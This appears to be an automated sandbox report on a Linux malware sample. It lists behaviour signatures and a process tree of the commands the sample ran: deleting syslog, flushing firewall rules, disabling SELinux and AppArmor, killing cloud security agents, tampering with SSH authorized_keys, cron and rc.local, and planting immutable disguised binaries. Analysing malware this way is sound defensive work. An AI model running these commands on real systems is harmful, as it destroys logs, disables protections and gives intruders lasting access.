1e39f5f7d640646d7b219aedb10f8db7e89279597c59f3a8944fcee1b9827dda

Analysis

max time kernel
149s
max time network
138s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
31-03-2024 19:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
Size

41KB
MD5

5c75e6f27cc568187e4b7a6371c61181
SHA1

b485da0e29adf4b1c34e9b833f0aba7e7b40655d
SHA256

1e39f5f7d640646d7b219aedb10f8db7e89279597c59f3a8944fcee1b9827dda
SHA512

bbd352c6fc2f2e0dd1db3c81eff5499ed45f1c70bb37a536aac39cebc4b89964c8fd584272c5fb0690bd26cde961a55602b3dabef7adc9cb11d01bbfbad94282
SSDEEP

768:o7+FNcuFVc2zV0xvfK4urZuishkZBxWJY:bF+Ec20/url/xWJY

Score

8^/10

persistence

Malware Config

Signatures

Adds new SSH keys 1 IoCs

Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.

persistence

Processes:

5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

description	ioc	Process
File opened for modification	/root/.ssh/authorized_keys	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

Flushes firewall rules 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

Processes:

iptables

pid	Process
712	iptables

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

Processes:

5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

description	ioc	Process
File opened for modification	/etc/resolv.conf	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargsxargsxargsxargsxargschattrchattrxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargs

pid	Process
1075	xargs
1232	xargs
1612	xargs
1784	xargs
1800	xargs
1100	xargs
1454	xargs
1632	xargs
1740	xargs
2143
2247
2604
1133	xargs
1218	xargs
1511	xargs
2584
876	chattr
969	xargs
1173	xargs
1386	xargs
1481	xargs
1622	xargs
1178	xargs
1602	xargs
1667	xargs
1798	xargs
1768	xargs
868	xargs
873	chattr
1138	xargs
1760	xargs
1776	xargs
1814	xargs
1540	xargs
1597	xargs
2586
1786	xargs
2123
875	chattr
1123	xargs
1582	xargs
1657	xargs
1754	xargs
2163
1268	xargs
1391	xargs
1459	xargs
2103
710	chattr
886	chattr
908	xargs
1039	xargs
2139
1019	xargs
1095	xargs
1143	xargs
1300	xargs
1607	xargs
1730	xargs
2127
1080	xargs
1163	xargs
1198	xargs
1223	xargs

Creates/modifies Cron job 1 TTPs 5 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

Processes:

5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

description	ioc	Process
File opened for modification	/etc/cron.daily/logrotate	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/etc/cron.hourly/0anacron	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/var/spool/cron/1	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/etc/cron.d/.zsh	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/etc/crontab	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

Disables AppArmor 64 IoCs

Disables AppArmor security module.

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

pid	Process
809	systemctl
2088
2101
791	systemctl
807	systemctl
2093
2099
780	systemctl
2098
2201
2213
801	systemctl
811	systemctl
2076
2204
2212
2196
2075
2086
2083
760	systemctl
2073
2083
2227
780	systemctl
780	systemctl
2196
2234
813	systemctl
2207
760	systemctl
780	systemctl
2231
2216
792	systemctl
2077
2208
780	systemctl
2226
2230
2233
2221
799	systemctl
2069
2090
2083
2209
2196
2196
2229
2080
2206
2210
2216
779	systemctl
2083
795	systemctl
2081
2072
783	systemctl
1999
2092
2216
816	systemctl

Disables SELinux 11 IoCs

Disables SELinux security module.

Processes:

killkillkillkillgrepsetenforcekillgrepgrepgrepkill

pid	Process
1045	kill
1045	kill
1045	kill
1045	kill
1201	grep
759	setenforce
1045	kill
1313	grep
1625	grep
1645	grep
1045	kill

Enumerates running processes
Discovers information about currently running processes on the system

Modifies rc script 1 TTPs 1 IoCs

Adding/modifying system rc scripts is a common persistence mechanism.

persistence

Boot or Logon Autostart Execution

T1547

Processes:

5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

description	ioc	Process
File opened for modification	/etc/rc.d/rc.local	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

Processes:

pspspspgreppgreppspspspspgreppspgreppspspspspspspspspspspgreppspskillpgreppspspgreppgreppspgreppgreppspspspspspgreppspspspgreppgreppsps

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Write file to user bin folder 1 TTPs 6 IoCs

Hijack Execution Flow

T1574

Processes:

5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

description	ioc	Process
File opened for modification	/usr/bin/kswaped	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/irqbalanced	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/rctlcli	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/systemd-network	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/pamdicks	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/ip6network	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

Writes file to system bin folder 1 TTPs 6 IoCs

Hijack Execution Flow

T1574

Processes:

5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

description	ioc	Process
File opened for modification	/bin/ps
File opened for modification	/bin/top	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/bin/top
File opened for modification	/bin/pstree	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/bin/pstree
File opened for modification	/bin/ps	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pgreppspspspspgreppspspgreppgreppgreppspgreppspspspspspspspgreppspgreppspspspgreppspgreppsawkpspgreppspspkillpspspspspgrep

description	ioc	Process
File opened for reading	/proc/72/status	pgrep
File opened for reading	/proc/74/status	ps
File opened for reading	/proc/669/cmdline	ps
File opened for reading	/proc/147/cmdline	ps
File opened for reading	/proc/673/cmdline	ps
File opened for reading	/proc/17/status
File opened for reading	/proc/14/status	pgrep
File opened for reading	/proc/372/status
File opened for reading	/proc/36/cmdline	ps
File opened for reading	/proc/371/status	ps
File opened for reading	/proc/4/status	pgrep
File opened for reading	/proc/375/cmdline	pgrep
File opened for reading	/proc/371/status	pgrep
File opened for reading	/proc/222/stat	ps
File opened for reading	/proc/73/status	pgrep
File opened for reading	/proc/325/stat	ps
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/706/cmdline
File opened for reading	/proc/16/stat	ps
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/1405/stat	ps
File opened for reading	/proc/222/status	ps
File opened for reading	/proc/18/cmdline	pgrep
File opened for reading	/proc/328/cmdline
File opened for reading	/proc/6/status
File opened for reading	/proc/1143/cmdline	ps
File opened for reading	/proc/16/status
File opened for reading	/proc/669/cmdline	ps
File opened for reading	/proc/3/cmdline
File opened for reading	/proc/11/status
File opened for reading	/proc/104/cmdline
File opened for reading	/proc/325/status
File opened for reading	/proc/8/status
File opened for reading	/proc/325/status
File opened for reading	/proc/73/status	pgrep
File opened for reading	/proc/239/status
File opened for reading	/proc/139/stat	ps
File opened for reading	/proc/166/status	ps
File opened for reading	/proc/113/stat	ps
File opened for reading	/proc/3/cmdline	ps
File opened for reading	/proc/673/cmdline	pgrep
File opened for reading	/proc/36/cmdline
File opened for reading	/proc/70/stat	ps
File opened for reading	/proc/663/cmdline	pgrep
File opened for reading	/proc/5/cmdline
File opened for reading	/proc/104/cmdline	ps
File opened for reading	/proc/1603/stat	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/78/stat	ps
File opened for reading	/proc/13/cmdline	pgrep
File opened for reading	/proc/1/status
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/674/status	ps
File opened for reading	/proc/1415/stat	ps
File opened for reading	/proc/322/cmdline	pkill
File opened for reading	/proc/75/stat	ps
File opened for reading	/proc/139/cmdline	ps
File opened for reading	/proc/222/stat	ps
File opened for reading	/proc/695/status	ps
File opened for reading	/proc/239/cmdline
File opened for reading	/proc/114/cmdline	pgrep
File opened for reading	/proc/328/status	pgrep
File opened for reading	/proc/17/status

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

Processes:

apt-getapt-get5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

description	ioc	Process
File opened for modification	/tmp/fileutl.message.9U5ow8	apt-get
File opened for modification	/tmp/fileutl.message.ySfBYe	apt-get
File opened for modification	/tmp/fileutl.message.uVz6bu	apt-get
File opened for modification	/tmp/fileutl.message.xwVoVh	apt-get
File opened for modification	/tmp/svcguard	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/tmp/fileutl.message.dYom13	apt-get
File opened for modification	/tmp/fileutl.message.4HoWQ4	apt-get
File opened for modification	/tmp/fileutl.message.He3fqJ	apt-get
File opened for modification	/tmp/fileutl.message.ElpEed	apt-get
File opened for modification	/tmp/kdevtmpfsi	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/tmp/svcupdate	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

/tmp/5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
/tmp/5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
1⤵
- Adds new SSH keys
- Writes DNS configuration
- Creates/modifies Cron job
- Modifies rc script
- Write file to user bin folder
- Writes file to system bin folder
- Writes file to tmp directory
PID:699
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:700
- /bin/chmod
  chmod 777 /usr/bin/chattr
  2⤵
  PID:702
- /bin/chmod
  chmod 777 /bin/chattr
  2⤵
  PID:703
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:705
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:710
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:712
- /sbin/sysctl
  sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:717
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  PID:719
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  PID:722
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:724
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:726
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:728
- /bin/cat
  cat /var/spool/cron/1
  2⤵
  PID:730
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:733
- /bin/mv
  mv /usr/bin/wgettnt /usr/bin/wd1
  2⤵
  PID:735
- /bin/mv
  mv /usr/bin/curltnt /usr/bin/cd1
  2⤵
  PID:736
- /bin/mv
  mv /usr/bin/wget1 /usr/bin/wd1
  2⤵
  PID:737
- /bin/mv
  mv /usr/bin/curl1 /usr/bin/cd1
  2⤵
  PID:739
- /bin/mv
  mv /usr/bin/cur /usr/bin/cd1
  2⤵
  PID:741
- /bin/mv
  mv /usr/bin/cdl /usr/bin/cd1
  2⤵
  PID:742
- /bin/mv
  mv /usr/bin/cdt /usr/bin/cd1
  2⤵
  PID:744
- /bin/mv
  mv /usr/bin/xget /usr/bin/wd1
  2⤵
  PID:747
- /bin/mv
  mv /usr/bin/wge /usr/bin/wd1
  2⤵
  PID:748
- /bin/mv
  mv /usr/bin/wdl /usr/bin/wd1
  2⤵
  PID:750
- /bin/mv
  mv /usr/bin/wdt /usr/bin/wd1
  2⤵
  PID:751
- /bin/mv
  mv /usr/bin/wget /usr/bin/wd1
  2⤵
  PID:752
- /bin/mv
  mv /usr/bin/curl /usr/bin/cd1
  2⤵
  PID:754
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:755
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:756
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:758
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:757
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:759
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:760
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:761
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:762
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Enumerates kernel/hardware configuration
    PID:763
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:767
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    PID:768
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:769
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    PID:770
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:771
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    PID:772
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:773
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:774
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:775
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    PID:776
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    PID:777
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    PID:778
- /usr/local/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:760
- /usr/local/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:760
- /usr/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  PID:760
- /usr/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  PID:760
- /sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  PID:760
- /bin/systemctl
  systemctl stop apparmor.service
  2⤵
  PID:760
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:779
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:780
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:781
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:782
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:783
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Disables AppArmor
    PID:791
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:792
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:795
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:796
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Disables AppArmor
    PID:799
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Disables AppArmor
    PID:801
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    PID:803
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:805
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:807
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:809
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:811
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:813
- /usr/local/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:780
- /usr/local/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:780
- /usr/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  PID:780
- /usr/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:780
- /sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:780
- /bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:780
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:816
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:821
- /bin/grep
  grep aegis
  2⤵
  PID:820
- /bin/grep
  grep -v grep
  2⤵
  PID:819
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:822
- /bin/ps
  ps aux
  2⤵
  PID:818
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:829
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:828
- /bin/grep
  grep Yun
  2⤵
  PID:827
- /bin/grep
  grep -v grep
  2⤵
  PID:826
- /bin/ps
  ps aux
  2⤵
  PID:825
- /bin/rm
  rm -rf /usr/local/aegis
  2⤵
  PID:832
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:833
- /bin/sleep
  sleep 1
  2⤵
  PID:834
- /usr/bin/apt-get
  apt-get install -y unhide
  2⤵
  - Writes file to tmp directory
  PID:855
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:858
- /usr/bin/apt-get
  apt-get install -y gawk
  2⤵
  - Writes file to tmp directory
  PID:860
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:862
- /bin/sleep
  sleep 1
  2⤵
  PID:864
- /usr/bin/awk
  awk "{print \$4}"
  2⤵
  PID:867
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:868
- /bin/grep
  grep PID:
  2⤵
  PID:866
- /usr/sbin/unhide
  /usr/sbin/unhide quick
  2⤵
  PID:865
- /bin/sleep
  sleep 1
  2⤵
  PID:869
- /usr/bin/chattr
  chattr -i /usr/bin/ip6network
  2⤵
  PID:872
- /usr/bin/chattr
  chattr -i /usr/bin/kswaped
  2⤵
  - Attempts to change immutable files
  PID:873
- /usr/bin/chattr
  chattr -i /usr/bin/irqbalanced
  2⤵
  PID:874
- /usr/bin/chattr
  chattr -i /usr/bin/rctlcli
  2⤵
  - Attempts to change immutable files
  PID:875
- /usr/bin/chattr
  chattr -i /usr/bin/systemd-network
  2⤵
  - Attempts to change immutable files
  PID:876
- /usr/bin/chattr
  chattr -i /usr/bin/pamdicks
  2⤵
  PID:877
- /usr/bin/chattr
  chattr +i /usr/bin/ip6network
  2⤵
  PID:878
- /usr/bin/chattr
  chattr +i /usr/bin/kswaped
  2⤵
  PID:880
- /usr/bin/chattr
  chattr +i /usr/bin/irqbalanced
  2⤵
  PID:882
- /usr/bin/chattr
  chattr +i /usr/bin/rctlcli
  2⤵
  PID:883
- /usr/bin/chattr
  chattr +i /usr/bin/systemd-network
  2⤵
  PID:884
- /usr/bin/chattr
  chattr +i /usr/bin/pamdicks
  2⤵
  - Attempts to change immutable files
  PID:886
- /bin/sleep
  sleep 1
  2⤵
  PID:888
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:906
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:907
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:908
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:905
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:914
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:913
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:912
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:911
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:921
- /bin/grep
  grep -v -
  2⤵
  PID:920
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:919
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:918
- /bin/grep
  grep :443
  2⤵
  PID:917
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:928
- /bin/grep
  grep -v -
  2⤵
  PID:927
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:926
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:925
- /bin/grep
  grep :23
  2⤵
  PID:924
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:934
- /bin/grep
  grep -v -
  2⤵
  PID:933
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:932
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:931
- /bin/grep
  grep :443
  2⤵
  PID:930
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:942
